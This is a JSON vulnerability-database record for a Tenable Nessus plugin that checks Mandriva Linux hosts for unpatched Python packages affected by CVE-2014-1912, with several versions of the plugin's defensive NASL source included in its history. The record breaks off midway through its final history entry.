{"id": "MANDRIVA_MDVSA-2014-041.NASL", "bulletinFamily": "scanner", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:041)", "description": "A vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.", "published": "2014-02-20T00:00:00", "modified": "2018-08-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=72594", "reporter": "Tenable", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "http://bugs.python.org/issue20246"], "cvelist": ["CVE-2014-1912"], "type": "nessus", "lastseen": "2019-01-16T20:18:01", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tkinter-apps", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:lib64python-devel"], "cvelist": ["CVE-2014-1912"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "A vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "385e7ef9ed67031f33ad4f57d40449f425930feef204f9bdf7ce0da7b08e0099", "hashmap": [{"hash": "750d729e31e0e44891f533ce4d0c7e34", "key": "sourceData"}, {"hash": "56a8969e704734c58918deb27219f300", "key": "pluginID"}, {"hash": "7f51b83a884bbf3dc9746fe5866c6354", "key": "description"}, {"hash": "cfc852798ae03ee34148d1cfcbb9e999", "key": "published"}, {"hash": "83dfc08c7f7afa19ea39d7f1f599a179", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "fa06f43e1ac45d37cab66d87ad17926e", "key": "href"}, {"hash": "c82db22f1c4a41616b1bb468d9808190", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d65569ff0d86eb6e9bc945e604df846a", "key": "cvelist"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "3b32f4a483a694cfe34cf4b7c7caf1b2", "key": "title"}, {"hash": "21fc9686c146fcf6b16f09134dff3269", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=72594", "id": "MANDRIVA_MDVSA-2014-041.NASL", "lastseen": "2018-08-30T19:36:53", "modified": "2018-08-03T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "72594", "published": "2014-02-20T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "http://bugs.python.org/issue20246"], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:041. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72594);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/03 11:35:08\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"MDVSA\", value:\"2014:041\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.5.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:041)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-08-30T19:36:53"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tkinter-apps", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:lib64python-devel"], "cvelist": ["CVE-2014-1912"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "A vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "302627b9201a8ca3abf6a8faa1c21bd6b13dd406fb934729fe32bcb2e6ab0cdf", "hashmap": [{"hash": "df101c185c62813466ef6ee78bad6482", "key": "sourceData"}, {"hash": "56a8969e704734c58918deb27219f300", "key": "pluginID"}, {"hash": "7f51b83a884bbf3dc9746fe5866c6354", "key": "description"}, {"hash": "cfc852798ae03ee34148d1cfcbb9e999", "key": "published"}, {"hash": "83dfc08c7f7afa19ea39d7f1f599a179", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fa06f43e1ac45d37cab66d87ad17926e", "key": "href"}, {"hash": "c82db22f1c4a41616b1bb468d9808190", "key": "references"}, {"hash": "4867c03e6d12c34bfe39d32c38729b6e", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d65569ff0d86eb6e9bc945e604df846a", "key": "cvelist"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "3b32f4a483a694cfe34cf4b7c7caf1b2", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=72594", "id": "MANDRIVA_MDVSA-2014-041.NASL", "lastseen": "2018-07-01T13:48:47", "modified": "2018-06-29T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "72594", "published": "2014-02-20T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "http://bugs.python.org/issue20246"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:041. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72594);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/29 12:01:01\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"MDVSA\", value:\"2014:041\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.5.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:041)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2018-07-01T13:48:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2014-1912"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "A vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.", "edition": 1, "enchantments": {}, "hash": "9b92f09c9b613c1012463eedc54429c9bb8e73c5ce022dabc2c4aba3568b9f2c", "hashmap": [{"hash": "30f8a3cd16450f4fae9f6381156dd10d", "key": "modified"}, {"hash": "56a8969e704734c58918deb27219f300", "key": "pluginID"}, {"hash": "7f51b83a884bbf3dc9746fe5866c6354", "key": "description"}, {"hash": "cfc852798ae03ee34148d1cfcbb9e999", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fa06f43e1ac45d37cab66d87ad17926e", "key": "href"}, {"hash": "c82db22f1c4a41616b1bb468d9808190", "key": "references"}, {"hash": "a54ba23cac1969a5a4c4fc2ae60ee5cb", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d65569ff0d86eb6e9bc945e604df846a", "key": "cvelist"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "3b32f4a483a694cfe34cf4b7c7caf1b2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=72594", "id": "MANDRIVA_MDVSA-2014-041.NASL", "lastseen": "2016-09-26T17:24:13", "modified": "2016-05-20T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.2", "pluginID": "72594", "published": "2014-02-20T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "http://bugs.python.org/issue20246"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:041. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72594);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/05/20 14:12:06 $\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"MDVSA\", value:\"2014:041\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.5.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:041)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:13"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tkinter-apps", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:lib64python-devel"], "cvelist": ["CVE-2014-1912"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "A vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "3429f24aaf34395e4cb56f5590caf96c8a16742928eba98033d2b7447a3798c4", "hashmap": [{"hash": "750d729e31e0e44891f533ce4d0c7e34", "key": "sourceData"}, {"hash": "56a8969e704734c58918deb27219f300", "key": "pluginID"}, {"hash": "7f51b83a884bbf3dc9746fe5866c6354", "key": "description"}, {"hash": "cfc852798ae03ee34148d1cfcbb9e999", "key": "published"}, {"hash": "83dfc08c7f7afa19ea39d7f1f599a179", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fa06f43e1ac45d37cab66d87ad17926e", "key": "href"}, {"hash": "c82db22f1c4a41616b1bb468d9808190", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d65569ff0d86eb6e9bc945e604df846a", "key": "cvelist"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "3b32f4a483a694cfe34cf4b7c7caf1b2", "key": "title"}, {"hash": "21fc9686c146fcf6b16f09134dff3269", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=72594", "id": "MANDRIVA_MDVSA-2014-041.NASL", "lastseen": "2018-09-01T23:42:26", "modified": "2018-08-03T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "72594", "published": "2014-02-20T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "http://bugs.python.org/issue20246"], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:041. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72594);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/03 11:35:08\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"MDVSA\", value:\"2014:041\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 